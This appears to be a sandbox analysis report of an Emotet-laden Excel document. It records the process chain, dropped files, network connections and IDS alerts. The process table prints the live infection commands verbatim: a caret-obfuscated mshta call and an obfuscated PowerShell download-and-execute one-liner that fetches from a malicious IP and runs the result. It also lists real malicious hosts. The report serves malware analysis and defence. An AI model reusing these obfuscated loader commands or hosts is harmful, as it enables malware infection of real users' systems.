File name: | Electronic form.xls |
Full analysis: | https://app.any.run/tasks/60676626-36bb-47b4-aea9-ca20ca9aafe4 |
Verdict: | Malicious activity |
Threats: | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns. |
Analysis date: | January 24, 2022, 23:44:36 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/vnd.ms-excel |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1251, Author: xXx, Last Saved By: xXx, Name of Creating Application: Microsoft Excel, Create Time/Date: Mon Jan 24 20:48:09 2022, Last Saved Time/Date: Mon Jan 24 20:51:47 2022, Security: 0 |
MD5: | AE02E072045DFDAE78521D24961B7608 |
SHA1: | 8617BC59446A70CE14FD93866B6E9D558E9BBE96 |
SHA256: | 86B6C6E2307EFDDDF79E29235474FC227CAD27B4C0DCD2A7B44785F2A2559074 |
SSDEEP: | 3072:Me+nBqmKk3hbdlylKsgqopeJBWhZFGkE+cMLxAAImxe53lGvFTQ3IzxgdrvxpU0f:z+nBqmKk3hbdlylKsgqopeJBWhZFVE+m |
.xls | | | Microsoft Excel sheet (78.9) |
---|
HeadingPairs: |
|
---|---|
TitleOfParts: |
|
HyperlinksChanged: | No |
SharedDoc: | No |
LinksUpToDate: | No |
ScaleCrop: | No |
AppVersion: | 16 |
Company: | - |
CodePage: | Windows Cyrillic |
Security: | None |
ModifyDate: | 2022:01:24 20:51:47 |
CreateDate: | 2022:01:24 20:48:09 |
Software: | Microsoft Excel |
LastModifiedBy: | xXx |
Author: | xXx |
PID | CMD | Path | Indicators | Parent process | |||||||||||
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
3104 | "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /dde | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | — | Explorer.EXE | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Excel Version: 14.0.6024.1000 Modules
| |||||||||||||||
576 | cmd /c ms^h^ta ht^tp:/^/0x^b^907d60^7/fe^r/fe7.html | C:\Windows\system32\cmd.exe | — | EXCEL.EXE | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) Modules
| |||||||||||||||
2248 | mshta http://0xb907d607/fer/fe7.html | C:\Windows\system32\mshta.exe | cmd.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft (R) HTML Application host Exit code: 0 Version: 11.00.9600.16428 (winblue_gdr.131013-1700) Modules
| |||||||||||||||
2972 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({GOOGLE}{GOOGLE}Ne{GOOGLE}{GOOGLE}w{GOOGLE}-Obj{GOOGLE}ec{GOOGLE}{GOOGLE}t N{GOOGLE}{GOOGLE}et{GOOGLE}.W{GOOGLE}{GOOGLE}e'.replace('{GOOGLE}', ''); $c4='bC{GOOGLE}li{GOOGLE}{GOOGLE}en{GOOGLE}{GOOGLE}t).D{GOOGLE}{GOOGLE}ow{GOOGLE}{GOOGLE}nl{GOOGLE}{GOOGLE}{GOOGLE}o'.replace('{GOOGLE}', ''); $c3='ad{GOOGLE}{GOOGLE}St{GOOGLE}rin{GOOGLE}{GOOGLE}g{GOOGLE}(''ht{GOOGLE}tp{GOOGLE}://185.7.214.7/fer/fe7.png'')'.replace('{GOOGLE}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | mshta.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Version: 10.0.14409.1005 (rs1_srvoob.161208-1155) Modules
| |||||||||||||||
3368 | "C:\Windows\system32\SearchProtocolHost.exe" Global\UsGthrFltPipeMssGthrPipe2_ Global\UsGthrCtrlFltPipeMssGthrPipe2 1 -2147483646 "Software\Microsoft\Windows Search" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)" "C:\ProgramData\Microsoft\Search\Data\Temp\usgthrsvc" "DownLevelDaemon" | C:\Windows\system32\SearchProtocolHost.exe | — | SearchIndexer.exe | |||||||||||
User: SYSTEM Company: Microsoft Corporation Integrity Level: SYSTEM Description: Microsoft Windows Search Protocol Host Version: 7.00.7601.24542 (win7sp1_ldr_escrow.191209-2211) Modules
| |||||||||||||||
3004 | "C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\Users\Public\Documents\ssd.dll,AnyString | C:\Windows\system32\cmd.exe | — | powershell.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) Modules
| |||||||||||||||
684 | C:\Windows\SysWow64\rundll32.exe C:\Users\Public\Documents\ssd.dll,AnyString | C:\Windows\SysWow64\rundll32.exe | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows host process (Rundll32) Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
3508 | C:\Windows\system32\rundll32.exe "C:\Users\Public\Documents\ssd.dll",DllRegisterServer | C:\Windows\system32\rundll32.exe | rundll32.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows host process (Rundll32) Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
2516 | C:\Windows\system32\rundll32.exe "C:\Users\admin\AppData\Local\Mazzzn\aadgnzwylzrz.qjg",yGAYrVUTcSGr | C:\Windows\system32\rundll32.exe | — | rundll32.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows host process (Rundll32) Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
4012 | C:\Windows\system32\rundll32.exe "C:\Users\admin\AppData\Local\Mazzzn\aadgnzwylzrz.qjg",DllRegisterServer | C:\Windows\system32\rundll32.exe | rundll32.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows host process (Rundll32) Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
|
(PID) Process: | (3104) EXCEL.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems |
Operation: | write | Name: | 4;= |
Value: 343B3D00200C0000010000000000000000000000 | |||
(PID) Process: | (3104) EXCEL.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages |
Operation: | write | Name: | 1033 |
Value: Off | |||
(PID) Process: | (3104) EXCEL.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages |
Operation: | write | Name: | 1041 |
Value: Off | |||
(PID) Process: | (3104) EXCEL.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages |
Operation: | write | Name: | 1046 |
Value: Off | |||
(PID) Process: | (3104) EXCEL.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages |
Operation: | write | Name: | 1036 |
Value: Off | |||
(PID) Process: | (3104) EXCEL.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages |
Operation: | write | Name: | 1031 |
Value: Off | |||
(PID) Process: | (3104) EXCEL.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages |
Operation: | write | Name: | 1040 |
Value: Off | |||
(PID) Process: | (3104) EXCEL.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages |
Operation: | write | Name: | 1049 |
Value: Off | |||
(PID) Process: | (3104) EXCEL.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages |
Operation: | write | Name: | 3082 |
Value: Off | |||
(PID) Process: | (3104) EXCEL.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages |
Operation: | write | Name: | 1042 |
Value: Off |
PID | Process | Filename | Type | |
---|---|---|---|---|
3104 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\CVR2B05.tmp.cvr | — | |
MD5:— | SHA256:— | |||
3104 | EXCEL.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\Electronic form.xls.LNK | lnk | |
MD5:D1C643EA6ED90FA098C1E0205871C301 | SHA256:1D72FD3879E19DB433F5B0BBAA83D7CB372AE275664AEBB6E1B32386C14BB3B6 | |||
2248 | mshta.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\PO2HN1X2\fe7[1].htm | binary | |
MD5:609F432C37632E29A7C054768B5A7A75 | SHA256:C6AF32BE73AC371CDAF55B8EB49F2668197009C917054D30FD239E273073DF03 | |||
3508 | rundll32.exe | C:\Users\admin\AppData\Local\Mazzzn\aadgnzwylzrz.qjg | executable | |
MD5:628B5EA54651D6A8D9F6D442099CCB6F | SHA256:8A7A77B1050DE515440FB333E53B11793A13EC8881A25A0558546CE9A3B5477F | |||
2972 | powershell.exe | C:\Users\Public\Documents\ssd.dll | executable | |
MD5:628B5EA54651D6A8D9F6D442099CCB6F | SHA256:8A7A77B1050DE515440FB333E53B11793A13EC8881A25A0558546CE9A3B5477F | |||
2972 | powershell.exe | C:\Users\admin\AppData\Local\Temp\mxvwf23n.juy.psm1 | binary | |
MD5:C4CA4238A0B923820DCC509A6F75849B | SHA256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B | |||
2972 | powershell.exe | C:\Users\admin\AppData\Local\Temp\gi2yd10w.y13.ps1 | binary | |
MD5:C4CA4238A0B923820DCC509A6F75849B | SHA256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B | |||
2972 | powershell.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache | binary | |
MD5:1068BF0B9B98C206F587A7DB05F6DD06 | SHA256:534478EDAFC5087DAA3749624454988B1F7DF923BF1A0A9E28C5F97C3308CFDB | |||
3104 | EXCEL.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\index.dat | ini | |
MD5:ED5B02B473DEF381B2ECD12C13538959 | SHA256:AE3372ADAE645D4CC3730E77097E74C8CA5196C883CF5F653B446502EBB477F5 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
2972 | powershell.exe | GET | 200 | 185.7.214.7:80 | http://185.7.214.7/fer/fe7.png | FR | text | 1.06 Kb | malicious |
2248 | mshta.exe | GET | 200 | 185.7.214.7:80 | http://185.7.214.7/fer/fe7.html | FR | binary | 10.8 Kb | malicious |
2972 | powershell.exe | GET | 200 | 119.18.48.131:80 | http://royallifeagroindia.com/Fox-C/7H/ | IN | executable | 780 Kb | suspicious |
2972 | powershell.exe | GET | 301 | 118.27.95.217:80 | http://id-tiara.com/well-known/hbPI8/ | JP | html | 162 b | unknown |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
2972 | powershell.exe | 34.70.177.225:443 | wordpress02.aftershipdemo.com | — | US | unknown |
2248 | mshta.exe | 185.7.214.7:80 | — | Qual.it S.a.s. | FR | malicious |
2972 | powershell.exe | 185.7.214.7:80 | — | Qual.it S.a.s. | FR | malicious |
— | — | 118.27.95.217:80 | id-tiara.com | — | JP | unknown |
2972 | powershell.exe | 118.27.95.217:443 | id-tiara.com | — | JP | unknown |
2972 | powershell.exe | 188.114.97.7:443 | leadrise.co | Cloudflare Inc | US | malicious |
2972 | powershell.exe | 119.18.48.131:80 | royallifeagroindia.com | SoftLayer Technologies Inc. | IN | suspicious |
4012 | rundll32.exe | 45.80.148.200:443 | — | — | — | suspicious |
Domain | IP | Reputation |
---|---|---|
wordpress02.aftershipdemo.com |
| unknown |
leadrise.co |
| malicious |
wordpress08.aftershipdemo.com |
| unknown |
id-tiara.com |
| unknown |
royallifeagroindia.com |
| suspicious |
PID | Process | Class | Message |
---|---|---|---|
2972 | powershell.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
2972 | powershell.exe | Potentially Bad Traffic | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download |
2972 | powershell.exe | Misc activity | ET INFO EXE - Served Attached HTTP |